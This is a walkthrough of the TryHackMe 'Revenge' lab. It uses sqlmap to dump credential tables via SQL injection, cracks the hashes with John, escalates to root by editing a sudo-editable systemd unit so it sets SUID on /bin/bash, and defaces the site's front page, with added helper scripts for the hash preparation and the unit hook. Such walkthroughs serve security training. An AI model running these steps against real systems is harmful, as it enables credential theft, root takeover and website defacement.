Revenge TryHackMe Writeup

In this article, I will be sharing a writeup of Revenge from TryHackMe. This machine is rated medium and takes us through exploiting a SQL injection to recover user credentials, cracking the password hashes with John the Ripper, and then abusing a sudo rule on a systemd service to get a root shell. With that said, let's get started!

Challenge Link: https://tryhackme.com/room/revenge

Before starting the challenge, we are provided with a text file which contains some hints:

To whom it may concern,

I know it was you who hacked my blog.  I was really impressed with your skills.  You were a little sloppy 
and left a bit of a footprint so I was able to track you down.  But, thank you for taking me up on my offer.  
I've done some initial enumeration of the site because I know *some* things about hacking but not enough.  
For that reason, I'll let you do your own enumeration and checking.

What I want you to do is simple.  Break into the server that's running the website and deface the front page.  
I don't care how you do it, just do it.  But remember...DO NOT BRING DOWN THE SITE!  We don't want to cause irreparable damage.

When you finish the job, you'll get the rest of your payment.  We agreed upon $5,000.  
Half up-front and half when you finish.

Good luck,

Billy

The letter tells us what the job actually is: we have to deface the front page of the website, without taking the site down. Keep that in mind, because it matters at the very end of the challenge.

Initial Enumeration

I started initial enumeration by running a port scan using nmap to check for open ports and services.

┌──(madhav㉿kali)-[~/ctf/thm/revenge]
└─$ nmap -sC -sV -oN nmap/initial 10.10.148.29 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-20 14:20 IST
Nmap scan report for 10.10.148.29
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 72:53:b7:7a:eb:ab:22:70:1c:f7:3c:7a:c7:76:d9:89 (RSA)
|   256 43:77:00:fb:da:42:02:58:52:12:7d:cd:4e:52:4f:c3 (ECDSA)
|_  256 2b:57:13:7c:c8:4f:1d:c2:68:67:28:3f:8e:39:30:ab (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Home | Rubber Ducky Inc.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.30 seconds

Only two ports are open: SSH on 22 and nginx on 80. (nmap scans the 1000 most common TCP ports by default, so a full -p- scan is worth running in the background.) I decided to enumerate port 80 first. Let's open our web browser and see what's running there.

We have a Rubber Ducky Inc. website. Next I ran a directory brute-force with gobuster to look for hidden directories.

┌──(madhav㉿kali)-[~/ctf/thm/revenge]
└─$ gobuster dir -u http://10.10.148.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt        
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.148.29
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/20 14:20:42 Starting gobuster in directory enumeration mode
===============================================================
/index               (Status: 200) [Size: 8541]
/contact             (Status: 200) [Size: 6906]
/products            (Status: 200) [Size: 7254]
/login               (Status: 200) [Size: 4980]
/admin               (Status: 200) [Size: 4983]
/static              (Status: 301) [Size: 194] [--> http://10.10.148.29/static/]
                                                                                 
===============================================================
2021/08/20 14:22:48 Finished
===============================================================

We have an /admin directory, but I could not find anything exploitable there. Next I started testing the basic functionality of the website and found that the /products page, which takes a product ID in the URL, is vulnerable to SQL injection.

When we visit http://10.10.148.29/products/1' (a single quote appended to the product ID), the application returns an error message. The quote closes the string literal in the backend query and breaks its syntax, which is the classic sign that the ID is concatenated straight into the SQL statement rather than passed as a bound parameter.

To exploit this, I used sqlmap, which automates the detection and exploitation of most kinds of SQL injection. The --batch flag accepts sqlmap's default answer to every prompt, so the commands below run unattended.

First I listed the available databases with the following command:

sqlmap -u "http://10.10.148.29/products/1" --batch --dbs

We can see that there is a database named duckyinc. Next we list the tables inside that database:

sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc --tables

There are two interesting tables, system_user and user. First I dumped the contents of the user table and found user records with their hashed passwords, plus our first flag.

sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T user --dump

Next I dumped the system_user table, which holds more users and password hashes. The table name suggests these are accounts on the server itself, so they are the ones worth cracking for SSH.

sqlmap -u "http://10.10.148.29/products/1" --batch -D duckyinc -T system_user --dump

Next I saved the password hashes to a text file (one user:hash pair per line) and ran a wordlist attack against them with John the Ripper:

john --wordlist=/usr/share/wordlists/rockyou.txt hashes

Hurray! We found a password. We can try the cracked credentials over SSH, and they work. After logging in, we can read our second flag in the user's home directory.
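The following is an added example, not part of the original writeup: it turns a sqlmap table dump into the user:hash format John expects and shows the John commands with the two caveats that usually bite (hash type not recognised, and where the cracked results end up). sqlmap writes one CSV per dumped table under its output directory (on recent versions ~/.local/share/sqlmap/output/<host>/dump/<db>/); that path, the column names and the placeholder hash values below are all assumptions, not data from the box.

```shell
#!/bin/sh
# Added example (not from the original writeup): prepare a sqlmap CSV dump
# for John the Ripper and crack it with a wordlist.

# Constructed sample shaped like a sqlmap CSV dump: a header row, then one
# row per user. The hash values are placeholders, not real hashes, and the
# column names are assumptions.
write_sample_dump() {
  cat > "$1" <<'EOF'
id,username,email,password
1,alice,alice@duckyinc.example,HASH_PLACEHOLDER_1
2,bob,bob@duckyinc.example,HASH_PLACEHOLDER_2
EOF
}

# Print "user:hash" lines for John. Columns are located by header name, so
# the function does not depend on the column order of a particular table.
# Assumes fields contain no embedded commas (true for usernames and hashes).
csv_to_john() {
  csv="$1"; user_col="$2"; hash_col="$3"
  awk -F, -v u="$user_col" -v h="$hash_col" '
    NR == 1 {
      for (i = 1; i <= NF; i++) { if ($i == u) uc = i; if ($i == h) hc = i }
      if (!uc || !hc) { print "csv_to_john: column not found" > "/dev/stderr"; exit 1 }
      next
    }
    { print $uc ":" $hc }
  ' "$csv"
}

# Crack the prepared file. Not run here: it needs john and rockyou.txt.
crack_with_john() {
  hashes="$1"
  # John guesses the hash type from the string. If it answers
  # "No password hashes loaded", pass --format=<type> (john --list=formats).
  john --wordlist=/usr/share/wordlists/rockyou.txt "$hashes"
  # Cracked results are cached in ~/.john/john.pot; --show prints user:password.
  john --show "$hashes"
}

tmp="$(mktemp)"
write_sample_dump "$tmp"
csv_to_john "$tmp" username password > "${tmp}.john"
cat "${tmp}.john"
```

Feed the user column of whichever table you are attacking (system_user for SSH candidates) and keep the user names in the file: John ignores them for cracking, but --show then tells you directly which account a recovered password belongs to.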

Next I ran sudo -l to see whether the user can run any commands as another user.

*********@duckyinc:~$ sudo -l
[sudo] password for *********: 
Matching Defaults entries for ********* on duckyinc:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ********* may run the following commands on duckyinc:
    (root) /bin/systemctl start duckyinc.service, /bin/systemctl enable duckyinc.service, /bin/systemctl restart duckyinc.service, /bin/systemctl daemon-reload, sudoedit
        /etc/systemd/system/duckyinc.service

The user can run sudoedit on duckyinc.service as root, and can also reload systemd and restart that service. That is a full root primitive: whatever we put in the unit's Exec lines is executed by systemd as root on the next restart. Open the unit for editing with:

sudoedit /etc/systemd/system/duckyinc.service

sudoedit copies the file to a temporary location, opens it in the editor named by SUDO_EDITOR, VISUAL or EDITOR (nano here), and writes the copy back as root when you save.

I modified the service so that the command systemd runs as root sets the SUID bit on /bin/bash, leaving the original start command in place so the website itself keeps running.

Next we make systemd re-read the modified unit and restart the service, using the two commands the sudo rule allows:

sudo systemctl daemon-reload
sudo systemctl restart duckyinc.service

Now if we check the permissions of /bin/bash, the SUID bit is set (an s in the owner's execute position). Running /bin/bash -p gives us a root shell; the -p flag stops bash from dropping the effective UID back to our own, which it does by default when it is SUID.
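The following is an added example, not code from the original writeup: the edit to make in duckyinc.service and the commands that turn it into a root shell. The writeup does not show the unit's original contents, so a constructed unit (a Flask app running under a low-privilege user) stands in for it; the unit path and the systemctl commands come from the sudo -l output above.

```shell
#!/bin/sh
# Added example (not from the original writeup): privilege escalation via
# sudoedit on a systemd unit plus the allowed daemon-reload/restart.

# Insert the escalation hook right after [Service] while keeping every
# original line, so the web service still starts and the site stays up
# (the note from Billy insists on that). The "+" prefix makes systemd run
# this one command as root even if the unit carries a User= line, and
# ExecStartPre runs before ExecStart on every start and restart.
add_suid_hook() {
  awk '
    { print }
    /^\[Service\]/ && !done { print "ExecStartPre=+/bin/chmod u+s /bin/bash"; done = 1 }
  ' "$1"
}

# Constructed stand-in for /etc/systemd/system/duckyinc.service; the real
# contents are not shown in the writeup and these lines are assumptions.
write_sample_unit() {
  cat > "$1" <<'EOF'
[Unit]
Description=Rubber Ducky Inc web application
After=network.target

[Service]
User=www-data
WorkingDirectory=/var/www/duckyinc
ExecStart=/usr/bin/python3 /var/www/duckyinc/app.py
Restart=always

[Install]
WantedBy=multi-user.target
EOF
}

# Steps on the target. Not run here: they need the sudo rule from sudo -l.
escalate() {
  # sudoedit opens a temporary copy in $SUDO_EDITOR/$VISUAL/$EDITOR as the
  # invoking user and writes it back as root on save. Add the ExecStartPre
  # line printed by add_suid_hook under [Service] and save.
  sudoedit /etc/systemd/system/duckyinc.service
  sudo /bin/systemctl daemon-reload             # re-read the modified unit
  sudo /bin/systemctl restart duckyinc.service  # ExecStartPre now runs as root
  ls -l /bin/bash                               # expect -rwsr-xr-x (s = SUID)
  /bin/bash -p                                  # -p keeps euid 0 instead of dropping it
}

tmp="$(mktemp)"
write_sample_unit "$tmp"
add_suid_hook "$tmp"
```

If the box's unit has no User= line the plain form without the plus sign works as well, but the plus-prefixed form is the safe default; and because the original ExecStart is untouched, the restart brings the site straight back up instead of replacing it with a one-shot chmod.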

But if we look, there is no root flag in the /root directory yet. We know from the note that we need to deface the front page in order to complete the challenge, so let's do it. Editing the page template is enough; there is no need to stop the service, which the note explicitly forbids.

nano /var/www/duckyinc/templates/index.html

Once the front page has been changed, check the /root directory again and the root flag is there.

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Jesse Brais.